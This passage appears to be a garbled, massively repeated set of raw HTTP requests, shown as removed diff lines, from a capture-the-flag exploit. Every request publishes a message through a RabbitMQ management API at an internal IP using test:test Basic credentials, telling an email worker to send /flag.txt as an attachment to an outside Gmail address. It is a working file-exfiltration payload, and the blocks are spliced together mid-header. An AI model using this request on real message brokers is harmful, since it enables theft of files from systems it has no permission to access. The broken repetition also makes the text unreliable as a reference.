-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
